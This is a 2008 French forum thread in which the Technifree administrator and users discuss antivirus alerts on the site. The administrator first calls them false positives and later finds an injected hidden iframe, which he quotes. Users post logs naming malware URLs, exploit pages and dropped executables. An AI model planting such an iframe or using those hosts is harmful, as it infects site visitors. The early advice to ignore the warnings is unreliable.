Connexion

Identifiant :

Mot de passe :

Se souvenir de moi



Mot de passe perdu ?

Inscrivez-vous !

Contenu du site

732 logiciels gratuits
242 Liens Web
4 Articles
349 Membres
10661 Posts sur le forum
Pour 1709 sujets

Site mis à jour le: 03.11.2017

Hébergeur d'images pour le site

Hébergeur d'images


Parcourir cette discussion :   1 Utilisateurs non enregistré en ligne




1234>


Message d'alerte virale ? la connexion ? Technifree ...
#1
Administrateur
Administrateur


Informations utilisateur
Bonjour,

certains d'entre-vous m'ont signalé une alerte de leur antivirus lors de la connexion ? technifree.
Ce message est généré par Avast et Antivir PE et ressemble ? ceci :

Access to the data has been denied!
Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL: http://www.technifree.fr/modules/mydo ... glefile.php?cid=49&lid=50
Information: Contains recognition pattern of the HTML/Infected.WebPage.Gen HTML script virus

Generated by AntiVir WebGuard 8.0.15.0, AVE 8.1.1.23, VDF 7.0.6.30


Ne tenez pas compte de ce message, il s'agit ici d'un script Javascript qui n'est pas reconnu par certains antivirus.
En espérant qu'une prochaine mise ? jour de ces produits permettront de résoudre le probl?me.

En attendant, je vous invite ? ignorer le message et vous garanti qu'aucun syst?me de fishing n'est envoyé par technifree. Le seul élément nécessaire ? la connexion est le cookie.

Si vous doutez, désactivez l'exécution des scripts (temporairement s'il le faut) de votre navigateur.

Date de publication : 20/08/2008 12:26
Image redimensionnée
Twitter Facebook Google Plus Linkedin Del.icio.us Digg Reddit Dénoncer Haut


Re: Message d'alerte virale ? la connexion ? Technifree ...
#2
Pro
Pro


Informations utilisateur
Comme Vincent le sait déj? :
- Messages d'alertes Avast sur Vista-SP1, mais le Pare-Feux Windows Vista n'a pas réagi (Je vais le remplacer prochainement par Kerio disponible maintenent Vista).
- Sur XP-SP1, pleins d'alertes Avast, avec en +, Kerio qui détéctait pleins de fichiers exe qui voulait se télécharger !!
- Sur W98SE, rien pour le momemrent !!!
PI : Je bosse sur le site sans les cookies TF.

Date de publication : 20/08/2008 22:26
Twitter Facebook Google Plus Linkedin Del.icio.us Digg Reddit Dénoncer Haut


Re: Message d'alerte virale ? la connexion ? Technifree ...
#3
Administrateur
Administrateur


Informations utilisateur
Je n'ai aucun message sur Vista SP1 Premium ni sur XP PRO SP3...........................ni sur ubuntu

Date de publication : 21/08/2008 07:25
Image redimensionnée
Twitter Facebook Google Plus Linkedin Del.icio.us Digg Reddit Dénoncer Haut


Re: Message d'alerte virale ? la connexion ? Technifree ...
#4
Pro
Pro


Informations utilisateur
Rien du tout non plus.

Date de publication : 21/08/2008 10:26
Twitter Facebook Google Plus Linkedin Del.icio.us Digg Reddit Dénoncer Haut


Re: Message d'alerte virale ? la connexion ? Technifree ...
#5
Pro
Pro


Informations utilisateur
Si cela peut servir, voila ci-dessous, les alarmes que j'ai obtenu sur XP-Pro :

AVAST :
- 19/08/2008 16:13:52 _ 1108 Sign of "VBS:Malware-gen" has been found in "K:\WINDOWS\file.bat" file.
- 19/08/2008 16:14:11 _ 1108 Sign of "Win32:Trojan-gen {Other}" has been found in "http://124.217.250.85/~ave/etc/getexe ... 32&i=1498603012&e=1" file.
- 19/08/2008 16:14:34 _ 1108 Sign of "Win32:Trojan-gen {Other}" has been found in "K:\Temporary Internet Files\Content.IE5\CLSRM1IN\KB908676[1].exe" file.

KERIO Firewall (J'ai du bloquer des Fichiers .exe qui voulaient s'installer, puis éliminer manuellement certains qui avaient été quand m?me téléchargés, mais non installés) :
- winzwzhmhzze8mx.exe
- winlis9tbe.exe
- kb908157.exe
- svscchost.exe
- s87ekhv.exe

Date de publication : 21/08/2008 15:02
Twitter Facebook Google Plus Linkedin Del.icio.us Digg Reddit Dénoncer Haut


Re: Message d'alerte virale ? la connexion ? Technifree ...
#6
Pro
Pro


Informations utilisateur
J'ai laissé tombé avast pour antivir il y a quelques temps et je regrettes pas, beaucoup trop de faux positif avec avast et efficacité moins intéressante.

pas d'alerte avec antivir chez moi lors ma connexion ? TF

Date de publication : 21/08/2008 19:38
Twitter Facebook Google Plus Linkedin Del.icio.us Digg Reddit Dénoncer Haut


Re: Message d'alerte virale à la connexion à Technifree ...
#7
Administrateur
Administrateur


Informations utilisateur
Bonjour à toutes et à tous,

effectivement, il y avait bien quelque chose (qui passait à la trappe sous Linux).
Grâce à l'entêtement de Klipsch et d'autres personnes, j'ai pu découvrir un code malveillant dans les script de la page principale de technifree :

<br /><iframe src="http://uokill.zh.od.ua/su/in.cgi?20" width="0" height="0" frameborder="0"></iframe>


Plus d'infos (US) ici

Comment cette merde est arrivée là ? aucune idée sachant que j'ai la main sur le code global du site, c'est à se cogner la tête contre les murs.

En tout cas, merci à ceux qui m'ont fait cette remontée d'alerte dont j'invite à renouveler les tests.

Date de publication : 23/08/2008 13:12
Image redimensionnée
Twitter Facebook Google Plus Linkedin Del.icio.us Digg Reddit Dénoncer Haut


Re: Message d'alerte virale à la connexion à Technifree ...
#8
Aspirant
Aspirant


Informations utilisateur
bonjour à tous ...

Bon Vincent en me connectant ce matin alerte générale ... je me suis retrouvé sur un site russe.

Bon courage et à demain ...

Date de publication : 24/08/2008 10:12
Twitter Facebook Google Plus Linkedin Del.icio.us Digg Reddit Dénoncer Haut


Re: Message d'alerte virale à la connexion à Technifree ...
#9
Administrateur
Administrateur


Informations utilisateur
Salut,

j'ai omis de préciser de vider votre cache internet IE / FFX ... l'as tu fait depuis ta dernière visite, ainsi que les cookies ?

J'ai investigué et apparemment beaucoup de sites ont eu ce soucis (même certains FAI sur leur pages d’accueil)

Tiens, voila ce qu'on obtiens sur le site qui polluait Technifree :

Capture d'écran
clic sur l'image pour agrandir

Date de publication : 24/08/2008 11:18
Image redimensionnée
Twitter Facebook Google Plus Linkedin Del.icio.us Digg Reddit Dénoncer Haut


Re: Message d'alerte virale ? la connexion ? Technifree ...
#10
Pro
Pro


Informations utilisateur
Pour accéder au site, sans obtenir d'alarmes, j'ai du aller sur Maxthon et tout désactiver sauf les images. Cache enti?rement vidé, et cookies TF désactivés. Alertes suivantes sur VISTA (IE7) :
10/08/2008 18:05:01 SYSTEM 1588 Sign of "JS:Packed-A [Trj]" has been found in "C:\Users\moi\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CGMG0KCT\index[1].html" file.
10/08/2008 18:06:13 SYSTEM 1588 Sign of "ANI:CVE-2007-0038 [Expl]" has been found in "C:\Users\moi\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CGMG0KCT\x16b[1].html" file.
10/08/2008 19:36:19 SYSTEM 1672 Sign of "JS:Packed-A [Trj]" has been found in "http://67.222.135.88/cgi-bin/index.cgi?src9\unp263693594" file.
10/08/2008 19:36:57 SYSTEM 1672 Sign of "ANI:CVE-2007-0038 [Expl]" has been found in "http://124.217.250.85/~ave/etc/exploits/x16b.php" file.
10/08/2008 19:37:02 SYSTEM 1672 Sign of "Other:Malware-gen" has been found in "http://124.217.250.85/~ave/etc/exploits/x15b.php\Baaaaa.class" file.
10/08/2008 23:22:08 SYSTEM 1588 Sign of "JS:Packed-A [Trj]" has been found in "C:\Users\moi\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FGKDZ1H8\index[1].html" file.
11/08/2008 19:24:10 SYSTEM 1648 Sign of "JS:Packed-A [Trj]" has been found in "http://67.222.135.88/cgi-bin/index.cgi?src9\unp199544228" file.
11/08/2008 19:24:10 SYSTEM 1648 Sign of "JS:Packed-D [Trj]" has been found in "http://picturehost.ath.cx/update/1.php" file.
11/08/2008 19:24:10 SYSTEM 1648 Sign of "JS:Packed-D [Trj]" has been found in "http://picturehost.ath.cx/update/4.php" file.
11/08/2008 19:24:25 SYSTEM 1648 Sign of "JS:Packed-D [Trj]" has been found in "http://picturehost.ath.cx/update/3.php" file.
11/08/2008 19:24:42 SYSTEM 1648 Sign of "JS:Packed-D [Trj]" has been found in "http://picturehost.ath.cx/update/2.php" file.
11/08/2008 19:25:03 SYSTEM 1648 Sign of "JS:Packed-D [Trj]" has been found in "http://picturehost.ath.cx/update/8.php" file.
11/08/2008 19:25:14 SYSTEM 1648 Sign of "JS:Packed-D [Trj]" has been found in "http://picturehost.ath.cx/update/4.php" file.
11/08/2008 19:25:14 SYSTEM 1648 Sign of "JS:Packed-D [Trj]" has been found in "http://picturehost.ath.cx/update/9.php" file.
11/08/2008 19:25:17 SYSTEM 1648 Sign of "JS:Packed-D [Trj]" has been found in "http://picturehost.ath.cx/update/10.php" file.
11/08/2008 19:25:19 SYSTEM 1648 Sign of "JS:Packed-D [Trj]" has been found in "http://picturehost.ath.cx/update/3.php" file.
11/08/2008 19:26:30 SYSTEM 1648 Sign of "JS:Packed-D [Trj]" has been found in "http://picturehost.ath.cx/update/1.php" file.
11/08/2008 19:26:30 SYSTEM 1648 Sign of "JS:Packed-D [Trj]" has been found in "http://picturehost.ath.cx/update/9.php" file.
11/08/2008 19:26:30 SYSTEM 1648 Sign of "JS:Packed-D [Trj]" has been found in "http://picturehost.ath.cx/update/2.php" file.
11/08/2008 19:26:30 SYSTEM 1648 Sign of "JS:Packed-D [Trj]" has been found in "http://picturehost.ath.cx/update/8.php" file.
11/08/2008 19:26:30 SYSTEM 1648 Sign of "JS:Packed-D [Trj]" has been found in "http://picturehost.ath.cx/update/7.php" file.
23/08/2008 23:34:22 SYSTEM 1652 Sign of "JS:Packed-A [Trj]" has been found in "C:\Users\moi\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1SF3B2PS\index[1].html" file.
24/08/2008 12:00:37 SYSTEM 1608 Sign of "JS:Packed-A [Trj]" has been found in "http://db33g54d77j.cn/cgi-bin/index.cgi?user2" file.
24/08/2008 12:41:16 SYSTEM 1628 Sign of "JS:Packed-A [Trj]" has been found in "http://db33g54d77j.cn/cgi-bin/index.cgi?user2" file.
24/08/2008 14:43:10 SYSTEM 1628 Sign of "JS:Packed-A [Trj]" has been found in "http://db33g54d77j.cn/cgi-bin/index.cgi?user2" file.
24/08/2008 23:49:26 SYSTEM 1756 Sign of "JS:Packed-A [Trj]" has been found in "http://db33g54d77j.cn/cgi-bin/index.cgi?user2" file.
24/08/2008 23:49:57 SYSTEM 1756 Sign of "ANI:CVE-2007-0038 [Expl]" has been found in "http://124.217.250.85/~ave/etc/exploits/x16b.php" file.
24/08/2008 23:50:01 SYSTEM 1756 Sign of "Other:Malware-gen" has been found in "http://124.217.250.85/~ave/etc/exploits/x15b.php\Baaaaa.class" file.

Date de publication : 24/08/2008 23:14
Twitter Facebook Google Plus Linkedin Del.icio.us Digg Reddit Dénoncer Haut








[Recherche avancée]